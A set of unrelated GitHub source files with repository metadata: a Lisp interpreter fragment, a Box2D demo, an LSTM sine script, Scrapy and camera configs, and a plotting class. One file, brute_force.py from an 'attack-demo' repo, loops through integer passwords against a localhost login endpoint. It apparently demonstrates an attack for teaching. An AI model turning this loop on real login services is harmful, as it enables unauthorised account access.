                self.expand_quasiquote(x[0]),
                self.expand_quasiquote(x[1:])
            ]

    def builtin_quasiquote(self, scope, args):
        """(quasiquote x): expand the template and evaluate the expansion."""
        y = self.expand_quasiquote(args[0])
        y = self.eval_lisp(y, scope)
        return y

    def builtin_print(self, scope, args):
        """(print x): print the lisp representation followed by a newline."""
        self.assert_nargs("print", args, 1)
        obj = self.eval_lisp(args[0], scope=scope)
        print(to_lisp(obj))

    def builtin_prin1(self, scope, args):
        """(prin1 x): print the lisp representation without a trailing newline."""
        self.assert_nargs("prin1", args, 1)
        print(to_lisp(self.eval_lisp(args[0], scope=scope)), end='')

    def builtin_while(self, scope, args):
        """(while cond body): evaluate body until cond is falsy.

        NOTE(review): relies on Python truthiness of the condition's value
        rather than is_true() as builtin_if does -- confirm V_NIL is falsy.
        """
        (cond, body) = args
        while self.eval_lisp(cond, scope=scope):
            self.eval_lisp(body, scope=scope)

    def builtin_car(self, scope, args):
        """(car l): first element of the evaluated list."""
        self.assert_nargs("car", args, 1)
        args = self.eval_all(args, scope)
        self.assert_type_eval("car", args[0], 0, c.T_LIST)
        return args[0][0]

    def builtin_cdr(self, scope, args):
        """(cdr l): the evaluated list without its first element."""
        self.assert_nargs("cdr", args, 1)
        args = self.eval_all(args, scope)
        self.assert_type_eval("cdr", args[0], 0, c.T_LIST)
        return args[0][1:]

    def builtin_len(self, scope, args):
        """(len l): number of elements in the list (0 for nil)."""
        self.assert_nargs("len", args, 1)
        args = self.eval_all(args, scope)
        self.assert_type_eval("len", args[0], 0, [c.T_LIST, c.T_NIL])
        return len(args[0])

    def builtin_call(self, scope, args):
        """(call f a ...): evaluate f, then apply it to the remaining forms."""
        name = self.eval_lisp(args[0], scope)
        return self.eval_lisp([name] + args[1:], scope)

    # -- shared helpers for the numeric builtins ---------------------------
    # The ten math builtins below used to be ten near-identical copies of
    # the same validate/evaluate/type-check/loop body; they now share these
    # drivers.  sys.maxint (Python 2 only) was replaced with sys.maxsize.

    def _math_args(self, context, scope, args, minimum=1, maximum=sys.maxsize):
        """Validate count, evaluate, and type-check numeric arguments."""
        self.assert_rargs(context, args, minimum, maximum)
        args = self.eval_all(args, scope)
        for i in range(len(args)):
            self.assert_type_eval(context, args[i], i, [c.T_INTEGER, c.T_FLOAT])
        return args

    def _math_compare(self, context, op, scope, args):
        """Driver for =, <, <=, >, >=: compare args[0] against each later
        argument with *op* (this matches the original pairwise-with-first
        semantics, not chained adjacent comparison)."""
        args = self._math_args(context, scope, args)
        for x in args[1:]:
            if not op(args[0], x):
                return c.V_NIL
        return c.V_TRUE

    def _math_fold(self, context, op, scope, args):
        """Driver for +, -, /, *: left-fold *op* over the arguments."""
        args = self._math_args(context, scope, args)
        result = args[0]
        for x in args[1:]:
            result = op(result, x)
        return result

    def builtin_math_eq(self, scope, args):
        """(= a b ...): nil unless every later argument equals the first."""
        return self._math_compare("=", operator.eq, scope, args)

    def builtin_math_lt(self, scope, args):
        """(< a b ...): nil unless the first argument is less than each later one."""
        return self._math_compare("<", operator.lt, scope, args)

    def builtin_math_le(self, scope, args):
        """(<= a b ...): nil unless the first argument is <= each later one."""
        return self._math_compare("<=", operator.le, scope, args)

    def builtin_math_gt(self, scope, args):
        """(> a b ...): nil unless the first argument is greater than each later one."""
        return self._math_compare(">", operator.gt, scope, args)

    def builtin_math_ge(self, scope, args):
        """(>= a b ...): nil unless the first argument is >= each later one."""
        return self._math_compare(">=", operator.ge, scope, args)

    def builtin_math_add(self, scope, args):
        """(+ a b ...): sum of the arguments."""
        return self._math_fold("+", operator.add, scope, args)

    def builtin_math_sub(self, scope, args):
        """(- a b ...): first argument minus each of the rest."""
        return self._math_fold("-", operator.sub, scope, args)

    def builtin_math_div(self, scope, args):
        """(/ a b ...): successive division of the first argument.

        True division, matching the module-level `from __future__ import
        division` that governed the original `/=` as well.
        """
        return self._math_fold("/", operator.truediv, scope, args)

    def builtin_math_mul(self, scope, args):
        """(* a b ...): product of the arguments."""
        return self._math_fold("*", operator.mul, scope, args)

    def builtin_math_mod(self, scope, args):
        """(mod a b): remainder of a divided by b."""
        self.assert_nargs("mod", args, 2)
        args = self.eval_all(args, scope)
        for i in range(len(args)):
            self.assert_type_eval("mod", args[i], i, [c.T_INTEGER, c.T_FLOAT])
        return args[0] % args[1]

    def builtin_math_min(self, scope, args):
        """(min a ...): smallest argument."""
        args = self._math_args("min", scope, args)
        return min(args)

    def builtin_math_max(self, scope, args):
        """(max a ...): largest argument."""
        args = self._math_args("max", scope, args)
        return max(args)

    def builtin_begin(self, scope, args):
        """(begin a b ...): evaluate in order, return the last result."""
        result = c.V_NIL
        for x in args:
            result = self.eval_lisp(x, scope)
        return result

    def eval_all(self, args, scope):
        """Evaluate every form in *args* and return the list of results."""
        return [self.eval_lisp(x, scope) for x in args]

    def eval_lisp(self, item, scope):
        """Evaluate one parsed form in *scope*."""
        # Debug trace of every evaluated form (kept from the original code).
        print("Running: {}".format(to_lisp(item)))
        if isinstance(item, syntax.Symbol):
            return scope.get(item)
        elif not isinstance(item, list) or len(item) == 0:
            # Atoms and the empty list are self-evaluating.
            return item
        elif item[0] in self.BUILTINS:
            func = getattr(self, self.BUILTINS[item[0]])
            return func(scope, item[1:])
        else:
            procedure = self.eval_lisp(item[0], scope=scope)
            if isinstance(procedure, Macro):
                # Macros receive their arguments unevaluated; the expansion
                # they return is evaluated afterwards.
                arguments = item[1:]
                procedure.outer_scope = scope
                lisp = procedure(*arguments)
                return self.eval_lisp(lisp, scope)
            elif isinstance(procedure, Procedure):
                arguments = [self.eval_lisp(arg, scope=scope) for arg in item[1:]]
                return procedure(*arguments)
            else:
                print(item)
                raise RuntimeError("Not callable")
| [
"krzysztof@magosa.pl"
] | krzysztof@magosa.pl |
ae2a22cc0b1cc5579211830f6a6aea5b8a5a3389 | 81cdfbe8258dac8fd0e150fcc9faed6b32ac7aeb | /brute_force.py | 30b31428b1d3882a186a84a4afb7b0a6af51642d | [] | no_license | nabinkhadka/attack-demo | f7299e18bc8d261509926593820df75cb3aad8b1 | 439cb05cf0428d0a872cdc6e2e09166d1329cf69 | refs/heads/master | 2020-04-24T10:13:00.913199 | 2019-02-21T14:27:18 | 2019-02-21T14:27:18 | 171,885,919 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 396 | py | import json
import string
from requests import post as POST
# Login endpoint of the demo application under attack.
URL = 'http://127.0.0.1:5000/login'

if __name__ == '__main__':
    # Try every non-negative integer password in ascending order until the
    # server reports a successful login.
    guess_password = 0
    while True:
        reply = POST(URL, data={'username': 'Nabin', 'password': str(guess_password)})
        if json.loads(reply.text).get('success'):
            print(f'Password is {guess_password}')
            break
        guess_password += 1
"noreply@github.com"
] | noreply@github.com |
336dc156e43a58de4bf5f3dfc9056d7fa904aff8 | 4f8ad548979f2b8a600b82ce0933f32733a45b9b | /testbed/test_ContactCallbackTest.py | b30924ccb3477f443aa912c1baf1000332939980 | [] | no_license | bxie1/PhysicsBalance | ff79b8bad161f561b243eaae4201bd983cb50c63 | 1bb160f1310e5bca88929d3d5cc55f568a826bb2 | refs/heads/master | 2021-03-12T20:31:56.493496 | 2014-04-16T04:05:13 | 2014-04-16T04:05:13 | 18,660,031 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,370 | py | #!/usr/bin/python
#
# C++ version Copyright (c) 2006-2007 Erin Catto http://www.gphysics.com
# Python version Copyright (c) 2008 kne / sirkne at gmail dot com
#
# Implemented using the pybox2d SWIG interface for Box2D (pybox2d.googlecode.com)
#
# This software is provided 'as-is', without any express or implied
# warranty. In no event will the authors be held liable for any damages
# arising from the use of this software.
# Permission is granted to anyone to use this software for any purpose,
# including commercial applications, and to alter it and redistribute it
# freely, subject to the following restrictions:
# 1. The origin of this software must not be misrepresented; you must not
# claim that you wrote the original software. If you use this software
# in a product, an acknowledgment in the product documentation would be
# appreciated but is not required.
# 2. Altered source versions must be plainly marked as such, and must not be
# misrepresented as being the original software.
# 3. This notice may not be removed or altered from any source distribution.
from test_main import *
from test_main import fwContactTypes
import math
import pprint
pp = pprint.PrettyPrinter(indent=4)
# Contributed by caspin (C++ version)
class ContactCallbackTest (Framework):
    """Contact-callback demo: an octagonal 'ball' drops through a funnel of
    ground triangles; Step() prints the contact events reported for each
    userData-tagged shape."""
    name="ContactCallbackTest"
    ball=None
    bullet=None
    ball_shape=None
    _pickle_vars = ['ball', 'bullet', 'ball_shape']

    def __init__(self):
        super(ContactCallbackTest, self).__init__()
        groundBody = self.world.GetGroundBody()

        sd=box2d.b2PolygonDef()
        sd.friction = 0

        # The funnel floor: one triangle per entry, tagged with its 1-based
        # index as userData so contact reports identify the touched shape.
        # (Replaces 17 copy-pasted vertices/userData/CreateShape stanzas.)
        triangles = [
            [(10.0, 10.0), (9.0, 7.0), (10.0, 0.0)],
            [(9.0, 7.0), (8.0, 0.0), (10.0, 0.0)],
            [(9.0, 7.0), (8.0, 5.0), (8.0, 0.0)],
            [(8.0, 5.0), (7.0, 4.0), (8.0, 0.0)],
            [(7.0, 4.0), (5.0, 0.0), (8.0, 0.0)],
            [(7.0, 4.0), (5.0, 3.0), (5.0, 0.0)],
            [(5.0, 3.0), (2.0, 2.0), (5.0, 0.0)],
            [(2.0, 2.0), (0.0, 0.0), (5.0, 0.0)],
            [(2.0, 2.0), (-2.0, 2.0), (0.0, 0.0)],
            [(-5.0, 0.0), (0.0, 0.0), (-2.0, 2.0)],
            [(-5.0, 0.0), (-2.0, 2.0), (-5.0, 3.0)],
            [(-5.0, 0.0), (-5.0, 3.0), (-7.0, 4.0)],
            [(-8.0, 0.0), (-5.0, 0.0), (-7.0, 4.0)],
            [(-8.0, 0.0), (-7.0, 4.0), (-8.0, 5.0)],
            [(-8.0, 0.0), (-8.0, 5.0), (-9.0, 7.0)],
            [(-10.0, 0.0), (-8.0, 0.0), (-9.0, 7.0)],
            [(-10.0, 0.0), (-9.0, 7.0), (-10.0, 10.0)],
            ]
        for index, vertices in enumerate(triangles):
            sd.vertices = vertices
            sd.userData = index + 1
            groundBody.CreateShape(sd)

        # Side walls (as before, sd.userData keeps its last value here).
        sd.SetAsBox(.5,6,(10.5,6),0)
        groundBody.CreateShape(sd)
        sd.SetAsBox(.5,6,(-10.5,6),0)
        groundBody.CreateShape(sd)

        # The falling body: a regular octagon of width w, tagged 'BALL'.
        bd=box2d.b2BodyDef()
        bd.position=(9.5,60)
        self.ball = self.world.CreateBody( bd )

        cd=box2d.b2PolygonDef()
        cd.vertexCount = 8
        w = 1.0
        b = w / (2.0 + math.sqrt(2.0))
        s = math.sqrt(2.0) * b
        cd.vertices = [( 0.5 * s, 0.0),
                       ( 0.5 * w, b),
                       ( 0.5 * w, b + s),
                       ( 0.5 * s, w),
                       (-0.5 * s, w),
                       (-0.5 * w, b + s),
                       (-0.5 * w, b),
                       (-0.5 * s, 0.0) ]
        cd.density = 1.0
        cd.userData = 'BALL'

        self.ball_shape = self.ball.CreateShape(cd)
        self.ball.SetMassFromShapes()

    def Step(self, settings):
        # Map contact-state enums to human-readable labels.
        name_dict = { fwContactTypes.contactAdded : "added",
                      fwContactTypes.contactRemoved : "removed",
                      fwContactTypes.contactPersisted : "persisted" }
        strings = ["%s: %s, %s (%s)" % (name_dict[point.state], point.shape1.userData, point.shape2.userData, point.id.key)
                        for point in self.points]
        # Cap the on-screen report so it does not overflow the viewport.
        if len(strings) > 15:
            strings = strings[:14]

        for string in strings:
            self.DrawStringCR(string)

        super(ContactCallbackTest, self).Step(settings)
# Run this test standalone via the shared framework entry point.
if __name__=="__main__":
    main(ContactCallbackTest)
| [
"bxie1@cs.swarthmore.edu"
] | bxie1@cs.swarthmore.edu |
7004499ea3b151a6bcf2d8ed421b35095129113a | 1b10fceb1c57e86424da38305baff903801644b4 | /docs/skeletons/test/Amazon_cost_test.py | b8fa78a13fb992cdbe54987cc3907780423c1702 | [
"MIT"
] | permissive | ramyasaimullapudi/ItemStockTracker | 82a07c0b3d0e8e8516ef206b57d3520fa411a542 | db958af9063cfad653115c727a94fd6e0957ea90 | refs/heads/main | 2023-04-11T07:17:40.854706 | 2021-11-04T21:52:43 | 2021-11-04T21:52:43 | 416,888,118 | 0 | 3 | MIT | 2021-12-04T04:39:52 | 2021-10-13T20:25:59 | Python | UTF-8 | Python | false | false | 223 | py | def test_check_cost():
"""
Tests if the cost value is received correctly for each of the 5 stock
status conditions (In Stock, Order Soon, Out of Stock, In Stock Soon,
Invalid URL) on www.amazon.com.
"""
| [
"krishnasaurabh123@gmail.com"
] | krishnasaurabh123@gmail.com |
828980f9b3d55d7772d7fcd0e4a3fa217dda1d18 | 83da60453633c40bb0ad26fb1c231d316b7fbb6d | /code_examples/sine_generator/lstm_minibatchgd.py | b6262e92d8ad10fe78714f1d1ec170cafaa0aba8 | [] | no_license | Hunterhal/pytorch_study | 3d93aacfa2fae2dc66fd468a55ec4f49f7ec22a2 | cd7eaa49f0a364b116dc2559a2fd208277ca396a | refs/heads/master | 2020-08-18T08:40:36.029590 | 2020-05-26T13:28:12 | 2020-05-26T13:28:12 | 215,770,601 | 4 | 1 | null | 2019-10-18T07:52:13 | 2019-10-17T10:58:22 | null | UTF-8 | Python | false | false | 3,772 | py | import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import numpy as np
import random
import matplotlib.pyplot as plt
import models
import time
# --- Sine-wave regression with a stacked LSTM (mini-batch gradient descent) ---

#Signal variables
sampling_freq = 200          # samples per period-unit of the signal
signal_duration = 2          # number of 2*pi periods generated
total_samples = sampling_freq * signal_duration

#Learning variables
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
max_epoch = 1000
test_number = 15             # run the test/plot loop every `test_number` epochs
learning_rate = 1e-3
batch_size = 16
seq_length = 5               # input window length fed to the LSTM

# LSTM parameters
num_layers = 3
size_hidden = 4
size_in = 1
size_out = size_in

# Ground-truth sine and a noisy observation of it.
x = torch.linspace(0, signal_duration * 2 * np.pi, total_samples, device=device)
y_gt = torch.sin(x)
y_noisy = y_gt + 0.05*torch.randn(x.size(), device=device)

model = models.LSTM(size_in=size_in, num_layers=num_layers, size_hidden=size_hidden, size_out=size_out, size_batch=batch_size).to(device)
print(model)

loss_function = nn.MSELoss()
optimizer = optim.Adam(model.parameters(), learning_rate)

# Shapes follow the (seq, batch, feature) convention of nn.LSTM.
input_batch = torch.zeros(seq_length, batch_size, 1, device=device) # Tensor for storing random samples of x
ground_truth_batch = torch.zeros(1, batch_size, 1, device=device) # Tensor for storing the samples of y_gt, which has the same indexes with x.

start_time = time.time() # Start timer
for epoch in range(max_epoch):
    #Train Loop
    for epoch_index in range(total_samples):
        # Fresh zeroed hidden/cell state for every mini-batch.
        h_state = torch.zeros(num_layers, batch_size, size_hidden, device=device)
        c_state = torch.zeros(num_layers, batch_size, size_hidden, device=device)
        for batch_index in range(batch_size):
            rand_index = random.randint(0, total_samples-1-seq_length) # Generate a random index through x.
            input_batch[:, batch_index, 0] = x[rand_index:rand_index+seq_length] # Copy a portion of it that has size of seq_length, to the input_batch.
            ground_truth_batch[0, batch_index, 0] = y_gt[rand_index+seq_length] # Do the same thing for y.
        out, (h_state, c_state) = model(input_batch, (h_state, c_state))
        # Detach in place so gradients do not flow across iterations.
        h_state.detach_()
        c_state.detach_()
        loss = loss_function(ground_truth_batch, out)
        optimizer.zero_grad()
        loss.backward()
        optimizer.step()
        print("TRAIN - Epoch: ", str(epoch), " Iteration: ", str(epoch_index), " Loss: ", str(loss.data))
    # Test loop - sliding-window, one-step-ahead prediction over the whole signal.
    if epoch % test_number == 0:
        out_buffer = torch.zeros(total_samples)
        for iteration_index in range(seq_length, total_samples):
            h_state = torch.zeros(num_layers, 1, size_hidden, device=device)
            c_state = torch.zeros(num_layers, 1, size_hidden, device=device)
            # Take the portion of x (which depends on iteration_index), reshape it so that it can be fed to the LSTM network.
            out, (h_state, c_state) = model(x[iteration_index-seq_length+1 : iteration_index+1].view(seq_length, 1, -1), (h_state, c_state))
            out_buffer[iteration_index] = out[0,0,0]
            # NOTE(review): compares a scalar target against the (1,1,1) output,
            # relying on broadcasting -- confirm this is intended.
            loss = loss_function(y_noisy[iteration_index], out) # Calculate loss between y_noisy and output of LSTM.
            print("TEST - Epoch: ", str(epoch), " Iteration: ", str(iteration_index), " Loss: ", str(loss.data))
        print("Elapsed time:", "{:2f}".format((time.time()-start_time)/60), "minutes since beginning of the training")
        # Plot the noisy target against the network's prediction.
        plt.plot(x.view(total_samples).cpu().detach(), y_noisy.view(total_samples).cpu().detach())
        plt.plot(x.view(total_samples).cpu().detach(), out_buffer.cpu().detach())
        plt.show()
"noreply@github.com"
] | noreply@github.com |
22d19c5a0f16028c404c69e817457406bc45eb8a | d64bf421ab0fbe21f05bfaae15b2e61ea2aff52b | /scrapping/scrapping/settings.py | c4bc41c28ffdba88f9f8e9a5f486421a948ddd9a | [] | no_license | NicolasGrosjean/GameDataAnalysis | ab782eb1bd8a1fe79385f80b0a2bc06299c03973 | ae0bd79d4069ab566984f68cb5552673b9b37a98 | refs/heads/master | 2020-03-14T07:10:10.835046 | 2018-05-12T12:27:30 | 2018-05-12T12:27:30 | 131,498,757 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,158 | py | # -*- coding: utf-8 -*-
# Scrapy settings for scrapping project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'scrapping'
SPIDER_MODULES = ['scrapping.spiders']
NEWSPIDER_MODULE = 'scrapping.spiders'
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'scrapping (+http://www.yourdomain.com)'
# Obey robots.txt rules
ROBOTSTXT_OBEY = True
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS = 32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY = 3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN = 16
#CONCURRENT_REQUESTS_PER_IP = 16
# Disable cookies (enabled by default)
#COOKIES_ENABLED = False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED = False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'scrapping.middlewares.ScrappingSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'scrapping.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.extensions.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'scrapping.pipelines.ScrappingPipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
#AUTOTHROTTLE_ENABLED = True
# The initial download delay
#AUTOTHROTTLE_START_DELAY = 5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY = 60
# The average number of requests Scrapy should be sending in parallel to
# each remote server
#AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG = False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED = True
#HTTPCACHE_EXPIRATION_SECS = 0
#HTTPCACHE_DIR = 'httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES = []
#HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"grosjen@hotmail.fr"
] | grosjen@hotmail.fr |
682b22c2a987a988cd53e2a272352b821fbdd3d1 | 20d688dda05718f40a1c87208ad120521e10deef | /bin/map.py | 320c341d42a663f375a8846838cb38e03db18c27 | [] | no_license | lucasnorman/LPTHW-Final | 32522d5efec43bb80db1bc7587152791e602e788 | 7f2503948e7a29e51f48da8693a90d241cc9e9c9 | refs/heads/master | 2021-07-05T16:07:12.768966 | 2017-10-03T04:18:04 | 2017-10-03T04:18:04 | 105,613,494 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,219 | py | from random import randint
class RoomError(Exception):
    """Domain-specific error for Room/map handling (not raised in this module)."""
    pass
class Room(object):
    """A single location on the game map.

    Holds a display name, the narrative text shown to the player, and a
    mapping of choice strings to neighbouring Room objects.
    """

    def __init__(self, name, description):
        self.name = name                # display name of the room
        self.description = description  # text shown when the room is entered
        self.paths = {}                 # choice string -> destination Room

    def go(self, direction):
        """Return the Room reached via *direction*, or None if no such exit."""
        return self.paths.get(direction)

    def add_paths(self, paths):
        """Merge *paths* (a choice -> Room mapping) into this room's exits."""
        self.paths.update(paths)
# ---------------------------------------------------------------------------
# Game map data ("Gothons from Planet Percal #25", LPTHW ex43-style).
# Each Room is built with a name and the narrative shown to the player; exits
# are wired together with add_paths() once all rooms exist, and START marks
# the entry point used by the game engine.
# ---------------------------------------------------------------------------
central_corridor = Room("Central Corridor",
"""
The Gothons of Planet Percal #25 have invaded your ship and destroyed
your entire crew. You are the last surviving member and your last
mission is to get the neutron destruct bomb from the Weapons Armory,
put it in the bridge, and blow the ship up after getting into an
escape pod.
You're running down the central corridor to the Weapons Armory when
a Gothon jumps out, red scaly skin, dark grimy teeth, and evil clown costume
flowing around his hate filled body. He's blocking the door to the
Armory and about to pull a weapon to blast you.
"""
)
laser_weapon_armory = Room("Laser Weapon Armory",
"""
Lucky for you they made you learn Gothon insults in the academy.
You tell the one Gothon joke you know:
Lbhe zbgure vf fb sng, jura fur fvgf nebhaq gur ubhfr, fur fvgf nebhaq gur ubhfr.
The Gothon stops, tries not to laugh, then busts out laughing and can't move.
While he's laughing you run up and shoot him square in the head
putting him down, then jump through the Weapon Armory door.
You do a dive roll into the Weapon Armory, crouch and scan the room
for more Gothons that might be hiding. It's dead quiet, too quiet.
You stand up and run to the far side of the room and find the
neutron bomb in its container. There's a keypad lock on the box
and you need the code to get the bomb out. If you get the code
wrong 10 times then the lock closes forever and you can't
get the bomb. The code is 3 digits.
"""
)
the_bridge = Room("The Bridge",
"""
The container clicks open and the seal breaks, letting gas out.
You grab the neutron bomb and run as fast as you can to the
bridge where you must place it in the right spot.
You burst onto the Bridge with the netron destruct bomb
under your arm and surprise 5 Gothons who are trying to
take control of the ship. Each of them has an even uglier
clown costume than the last. They haven't pulled their
weapons out yet, as they see the active bomb under your
arm and don't want to set it off.
""")
escape_pod = Room("Escape Pod",
"""
You point your blaster at the bomb under your arm
and the Gothons put their hands up and start to sweat.
You inch backward to the door, open it, and then carefully
place the bomb on the floor, pointing your blaster at it.
You then jump back through the door, punch the close button
and blast the lock so the Gothons can't get out.
Now that the bomb is placed you run to the escape pod to
get off this tin can.
You rush through the ship desperately trying to make it to
the escape pod before the whole ship explodes. It seems like
hardly any Gothons are on the ship, so your run is clear of
interference. You get to the chamber with the escape pods, and
now need to pick one to take. Some of them could be damaged
but you don't have time to look. There's 5 pods, which one
do you take?
""")
the_end_winner = Room("The End",
"""
You jump into pod 2 and hit the eject button.
The pod easily slides out into space heading to
the planet below. As it flies to the planet, you look
back and see your ship implode then explode like a
bright star, taking out the Gothon ship at the same
time. You won!
""")
the_end_loser = Room("The End",
"""
You jump into a random pod and hit the eject button.
The pod escapes out into the void of space, then
implodes as the hull ruptures, crushing your body
into jam jelly.
"""
)
generic_death = Room("death", "You died")
# Exit wiring: '*' is the engine's wildcard for "any other input".
# Escape pods: only pod 2 survives.
escape_pod.add_paths({
    '2': the_end_winner,
    '*': the_end_loser
})
the_bridge.add_paths({
    'throw the bomb': generic_death,
    'slowly place the bomb': escape_pod
})
# Keypad: the code '0132' opens the way to the bridge.
laser_weapon_armory.add_paths({
    '0132': the_bridge,
    '*': generic_death
})
central_corridor.add_paths({
    'shoot!': generic_death,
    'dodge!': generic_death,
    'tell a joke': laser_weapon_armory
})
# Entry point of the map, used by the game engine.
START = central_corridor
| [
"lucas.normann@gmail.com"
] | lucas.normann@gmail.com |
e3205ca78ec9c5c4154d6e2bc096e8713b5deffc | 78883afed6f95bc0aae9f48e9d20a4a7c77adb32 | /plugins/secpicam480.py | d9c6855043be61e4c9b27797e8255abed9640c19 | [] | no_license | xe1gyq/speed-camera | f7da04162afaece15033971e23692f5f24a715ed | 71306c058235bf1a7fb00c484c9d34f4ac0fefae | refs/heads/master | 2021-03-30T21:18:50.236194 | 2018-02-26T20:07:13 | 2018-02-26T20:07:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,341 | py | # ---------------- User Configuration Settings for speed-cam.py ---------------------------------
# Ver 8.4 speed-cam.py picam480 Stream Variable Configuration Settings
#######################################
# speed-cam.py plugin settings
#######################################
# Calibration Settings
# --------------------
calibrate = False # Create a calibration image file with calibration hash markers 10 px per mark
# Crop Area for motion detection Tracking
# ---------------------------------------
x_left = 150 # Default= 150 Exclude event if x less than this px position
x_right = 490 # Default= 490 Exclude event if x greater than this px position
y_upper = 140 # Default= 140 Exclude event if y less that this value
y_lower = 340 # Default= 340 Exclude event if y greater than this value
# Motion Event Settings
# ---------------------
SPEED_MPH = False # Set the speed conversion kph=False mph=True
MIN_AREA = 200 # Default= 200 Exclude all contours less than or equal to this sq-px Area
track_len_trig = 75 # Default= 75 Length of track to trigger speed photo
x_diff_max = 18 # Default= 18 Exclude if max px away >= last motion event x pos
x_diff_min = 1 # Default= 1 Exclude if min px away <= last event x pos
track_timeout = 0.0 # Default= 0.0 Optional seconds to wait after track End (Avoid dual tracking)
event_timeout = 0.3 # Default= 0.3 seconds to wait for next motion event before starting new track
log_data_to_CSV = False # Default= False True = Save log data as CSV comma separated values
# Camera Settings
# ---------------
WEBCAM = False # Default= False False=PiCamera True=USB WebCamera
# Pi Camera Settings
# ------------------
CAMERA_WIDTH = 640 # Default= 640 Image stream width for opencv motion scanning default=320
CAMERA_HEIGHT = 480 # Default= 480 Image stream height for opencv motion scanning default=240
CAMERA_FRAMERATE = 20 # Default = 30 Frame rate for video stream V2 picam can be higher
# Camera Image Settings
# ---------------------
image_path = "media/security" # folder name to store images
image_prefix = "scam-" # image name prefix security camera
image_show_motion_area = False # True= Display motion detection rectangle area on saved images
image_filename_speed = False # True= Prefix filename with speed value
image_text_on = False # True= Show Text on speed images False= No Text on images
image_bigger = 1.5 # Default= 1.5 Resize saved speed image by value
image_font_size = 18 # Default= 18 Font text height in px for text on images
imageRecentMax = 10 # 0=off Maintain specified number of most recent files in motionRecentDir
imageRecentDir = "media/recent/security" # default= "media/recent" save recent files directory path
# Optional Manage SubDir Creation by time, number of files or both
# ----------------------------------------------------------------
imageSubDirMaxHours = 0 # 0=off or specify MaxHours - Creates New dated sub-folder if MaxHours exceeded
imageSubDirMaxFiles = 0 # 0=off or specify MaxFiles - Creates New dated sub-folder if MaxFiles exceeded
# ---------------------------------------------- End of User Variables -----------------------------------------------------
| [
"pageauc@gmail.com"
] | pageauc@gmail.com |
d5de700c4c6369346d726ed69705fbfdc92718e2 | 37a8cb73718fc19d37feab4efe05802dfe075c5e | /util/_plot.py | b8b777206addf860fa7846805f2b15fe22ce241d | [
"MIT"
] | permissive | StevenZ315/Optimization-Algorithms | 43f3482766c6937bbfeef44ee1ed2d0ec7703fe9 | f470bfd40242cb9556ae6d64c4bda503970c141d | refs/heads/master | 2022-10-18T11:12:34.375953 | 2020-06-17T05:49:55 | 2020-06-17T05:49:55 | 271,703,817 | 1 | 1 | null | 2020-06-17T05:33:55 | 2020-06-12T03:56:17 | Python | UTF-8 | Python | false | false | 3,032 | py | import matplotlib.pyplot as plt
import matplotlib.animation as animation
import numpy as np
class AnimatedScatter(object):
    """An animated scatter plot using matplotlib.animations.FuncAnimation."""
    def __init__(self, data, func=None, title=None, contour=True, resolution=(100, 100)):
        """Build the animation.

        data: dict with 'solution' (one point set per frame),
        'solution_best' (one best point per frame) and 'boundary'
        ((xlim, ylim) pair for the axes).
        func: optional objective object exposing boundary(), function() and
        solution(); used for the contour background and the benchmark optimum.
        resolution: contour sampling grid as (nx, ny).
        """
        self.frames = len(data['solution'])
        self.data = data['solution']
        self.pbest = data['solution_best']
        self.boundary = data['boundary']
        # Global optimum if function is provided.
        if func:
            self.global_opt = func.solution()
        # Setup the figure and axes...
        self.fig, self.ax = plt.subplots()
        self.title = title
        # Only add contour when function is provided.
        if func and contour:
            self.add_contour(func, resolution)
        # Then setup FuncAnimation.
        self.ani = animation.FuncAnimation(self.fig, self.update, frames=self.frames, interval=500,
                                           init_func=self.setup_plot, blit=True)
    def add_contour(self, func, resolution):
        """Draw a filled greyscale contour of func over its boundary box."""
        xlist = np.linspace(func.boundary()[0][0], func.boundary()[0][1], resolution[0])
        ylist = np.linspace(func.boundary()[1][0], func.boundary()[1][1], resolution[1])
        # Calculate contour value matrix.
        X, Y = np.meshgrid(xlist, ylist)
        Z = np.empty(shape=X.shape)
        for row in range(Z.shape[0]):
            for col in range(Z.shape[1]):
                Z[row][col] = func.function((X[row][col], Y[row][col]))
